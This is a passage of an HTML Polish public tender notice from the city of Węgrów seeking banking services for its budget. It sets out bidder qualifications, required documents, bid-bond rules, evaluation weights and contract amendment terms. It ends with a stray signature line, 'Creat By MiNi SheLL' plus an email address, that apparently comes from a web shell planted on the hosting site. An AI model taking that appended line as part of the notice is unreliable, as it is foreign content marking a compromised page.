1)	Decyzję Prezesa Narodowego Banku Polskiego lub zezwolenie Komisji Nadzoru Bankowego w zakresie działalności bankowej.
<br />
                Informacje dodatkowe
                Zamawiający będzie oceniał spełnianie przez Wykonawcę ww. warunku poprzez szczegółową weryfikację złożonej decyzji bądź zezwolenia w zakresie działalności bankowej zgodnie z ustawą Prawo Bankowe (tekst jednolity Dz. U. z 2015r. poz.128). Ocena spełniania warunku udziału w postępowaniu zostanie przeprowadzona na podstawie dokumentów złożonych przez Wykonawców. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnił. 
<br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający  nie określa szczegółowego warunku w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający uzna warunek za spełniony jeżeli Wykonawca:
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykaże doświadczenie polegające na realizacji jednej usługi polegającej na prowadzeniu bankowej obsługi budżetu jednostki samorządu terytorialnego przez okres minimum 3 lat i której osiągnięte dochody budżetowe w jednym roku wyniosły nie mniej niż  40 000 000,00 zł 

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu w stosownych sytuacjach polegać na zdolnościach technicznych lub zawodowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.  Wykonawca, który polega na zdolnościach innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.  Zamawiający oceni, czy udostępniane wykonawcy przez inne podmioty zdolności techniczne lub zawodowe, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia. 
UWAGA:
W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. 

Jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego zasoby, nie potwierdzają spełnienia przez wykonawcę warunków udziału w postępowaniu, lub zachodzą wobec tych podmiotów podstawy wykluczenia, zamawiający zażąda, aby wykonawca w terminie określonym przez zamawiającego: 
a) 	zastąpił ten podmiot innym podmiotem lub podmiotami lub 
b) 	zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże zdolności techniczne lub zawodowe lub sytuację finansową lub ekonomiczną.

UWAGA:
1. Wykazując spełnianie warunku udziału w postępowaniu w wykazie usług złożonym wraz z ofertą należy podać wartość wykonanych usług w celu weryfikacji spełniania warunku udziału w postępowaniu. 
2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia lub korzystania z zasobów podmiotów trzecich na podstawie art. 22a pzp minimum jeden wykonawca lub jeden podmiot udostępniający zasoby musi posiadać pełne doświadczenie wskazane w warunku udziału w postępowaniu.
3. Wartości podane w dokumentach potwierdzających spełnienie warunku w walutach innych niż wskazane przez Zamawiającego Wykonawca przeliczy wg średniego kursu NBP na dzień zawarcia umów o ich wykonanie
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt 1 ustawy 

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w sekcji składa: 
-dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. 
Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się ww. dokumentów, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. 
W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.

W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty wymagane 
w pkt 6.3.1-6.3.2 SIWZ lub  6.4 SIWZ winny być złożone przez każdego z wykonawców.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />	Decyzja Prezesa Narodowego Banku Polskiego lub zezwolenie Komisji Nadzoru Bankowego w zakresie działalności bankowej.
	Wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert 
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie 
z art. 23 ustawy Prawo zamówień publicznych ( dotyczy również wspólników spółki cywilnej).
2.Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku, gdy dokumenty składające się na ofertę podpisuje osoba, której umocowanie do reprezentowania wykonawcy nie będzie wynikać z dokumentów załączonych do oferty.

W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty i oświadczenia składające się na ofertę powinny być podpisane przez pełnomocnika. 

Pełnomocnictwo powinno być przedstawione w formie oryginału lub kopii poświadczonej w drodze czynności notarialnej w rozumieniu ustawy z dnia 14 lutego 1991 r. Prawo o notariacie (Dz. U. z 2014 r.poz.164 z późn.zm). 

3.Zobowiązanie podmiotu do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia  jeśli dotyczy

4. Dowód wniesienia wadium

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.Wadium 5 000,00 zł (słownie: pięć tysięcy złotych 00/100) 
2.	Wadium może być wnoszone w następujących formach:
- pieniądzu,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty o których  mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2014 poz. 1804 ze zm.)
3 Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto Zamawiającego Miasto Węgrów, 
ul. Rynek Mariacki 16, 07-100 Węgrów, numer konta: 35 1020 4476 0000 8202 0022 3156 z dopiskiem: przetarg nieograniczony na zadanie pn. Obsługa bankowa budżetu Miasta Węgrowa i jednostek organizacyjnych
Za termin wniesienia wadium przyjmuje się datę uznania rachunku Zamawiającego.
4. W przypadku wniesienia wadium w formie gwarancji lub poręczenia dokument zabezpieczenia należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego.
5 Wadium wniesione w formie gwarancji ubezpieczeniowej lub bankowej będzie akceptowane  pod warunkiem, że jest zgodne z Prawem Zamówień Publicznych, a w szczególności:
5.1 gwarancja będzie zawierała wszystkie przypadki utraty wadium przez wykonawcę określone w art. 46. ust. 4a i ust. 5 Prawa Zamówień Publicznych
5.2 okres ważności gwarancji będzie nie krótszy niż okres związania ofertą określony w specyfikacji istotnych warunków zamówienia
6 Wadium wniesione w formie poręczenia bankowego, poręczenia spółdzielczej kasy  oszczędnościowo - kredytowej lub poręczenia udzielanego przez podmiot, o którym mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  będzie akceptowane pod warunkiem, że jest zgodne z Prawem Zamówień Publicznych, a w szczególności:
6.1 poręczenie będzie zawierało wszystkie przypadki utraty wadium przez wykonawcę określone w art. 46 ust. 4a i ust. 5 Prawa Zamówień Publicznych
6.2 poręczenie będzie zawierało określony datą termin odpowiedzialności, nie krótszy niż okres związania ofertą określony w Specyfikacji Istotnych Warunków Zamówienia.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>1a)Cena obsługi bankowej -Opłata ryczałtowa za realizacje przedmiotu zamówienia	</td><td>40</td></tr><tr><td>1b)Cena obsługi bankowej - Koszt obsługi kredytów</td><td>10</td></tr><tr><td>2a)Opłacalność oprocentowania wolnych środków -Oprocentowanie środków znajdujących się na rachunkach bankowych</td><td>40</td></tr><tr><td>2b) Opłacalność oprocentowania wolnych środków - Oprocentowanie środków na rachunkach lokat krótkoterminowych</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Istotne postanowienia umowy stanowi załącznik nr 5 do niniejszej specyfikacji istotnych warunków zamówienia.
1.	Zamawiający przewiduje dokonanie zmian zawartej umowy z Wykonawcą w następujących przypadkach:
1)	w przypadku zagrożenia płynności finansowej Zamawiającego spowodowanej przez zwiększone wydatki na usunięcie skutków klęsk żywiołowych lub innej podobnej okoliczności, bądź załamaniem dochodów budżetu przez pogorszenie sytuacji gospodarczej;
2)	dopuszcza się także możliwość przedłużenia terminu spłaty kredytu w rachunku bieżącym  o czas oznaczony;
3)	zmian przepisów prawa oraz wydanych  do  nich aktów wykonawczych  powiązanych z ustawą Pzp lub przepisami związanymi z przedmiotem zamówienia;
4)	zwiększenia lub zmniejszenia ilości prowadzonych rachunków pomocniczych;
5)	w przypadku zmian prawnych i organizacyjnych Wykonawcy;
6)	w przypadku zmian osób reprezentujących Miasto Węgrów;
7)	w razie zaistnienia zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach;
8)	coroczne zawieranie umowy na kredyt krótkoterminowy w rachunku bieżącym;
9)	zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, w przypadku gdy osoby realizujące przedmiotowe zamówienie otrzymują minimalne wynagrodzenie. Wartość umowy ulegnie odpowiedniej zmianie jeżeli Wykonawca przedłoży szczegółowe uzasadnienie potwierdzające minimalne wynagrodzenie osób skierowanych do realizacji zamówienia. Zmiana umowy w tym zakresie będzie dokonana po złożeniu pisemnego wniosku przez Wykonawcę;
10)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne. Wartość umowy ulegnie odpowiedniej zmianie jeżeli Wykonawca przedłoży szczegółowe uzasadnienie potwierdzające minimalne wynagrodzenie osób skierowanych do realizacji zamówienia. Zmiana umowy w tym zakresie będzie dokonana po złożeniu pisemnego wniosku przez Wykonawcę;
11)	wystąpienia innych okoliczności, nie dających się przewidzieć, które wpływają na realizacje przedmiotu umowy, a których Strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności.
2.	W przypadku niespełnienia warunku dot. siedziby, filii, oddziału lub punktu kasowego na terenie miasta Węgrów przez okres 3 miesięcy od dnia obowiązywania umowy Zamawiający zastrzega sobie możliwość odstąpienia od zawartej umowy.
3.	O wystąpieniu okoliczności mogących wpłynąć na zmianę umowy, o których mowa w pkt. 1 ppkt. 3) i 9-10) Wykonawca, zobowiązany jest poinformować Zamawiającego pisemnie jednak nie wcześniej niż po rozpoczęciu obowiązywania nowych przepisów prawa.
4.	Wykonawca w zawiadomieniu o zamiarze ubiegania się o zmianę zawartej umowy, zobowiązany będzie dostarczyć Zamawiającemu wyczerpujące i szczegółowe uzasadnienie swojego wniosku, pod warunkiem, że przyczyny te nie wynikają z uchybień lub z niedochowania należytej staranności Wykonawcy. Niezłożenie przedmiotowego wniosku pozbawia Wykonawcę możliwości dokonania zmian zawartej umowy z wyjątkiem pkt.1 ppkt. 3).
5.	Wartość umowy ulegnie odpowiedniej zmianie w przypadku określonym w pkt. 1 ppkt 9-10) jeżeli Wykonawca przedłoży szczegółowe uzasadnienie potwierdzające minimalne wynagrodzenie osób skierowanych do realizacji zamówienia. Zmiana umowy w tym zakresie będzie dokonana po złożeniu pisemnego wniosku przez Wykonawcę
6.	W przypadku wyrażenia zgody przez Zamawiającego na zmianę umowy w przypadkach określonych powyżej zostanie sporządzony aneks w formie pisemnej.

<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /> W przypadku gdyby oferta, oświadczenia lub dokumenty zawierały informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, Wykonawca powinien 
w sposób nie budzący wątpliwości zastrzec, że nie mogą być one udostępnione oraz wykazywać, że zastrzeżone informacje stanowiące tajemnice przedsiębiorstwa. Informacje te powinny być umieszczone w osobnym wewnętrznym opakowaniu, trwale ze sobą połączone i ponumerowane. Nie mogą stanowić tajemnicy przedsiębiorstwa informacje podane do wiadomości podczas otwarcia ofert, tj. informacje dotyczące ceny, terminu wykonania zamówienia, okresu gwarancji i warunków płatności zawartych w ofercie.
<br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 12/12/2016, godzina: 10:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com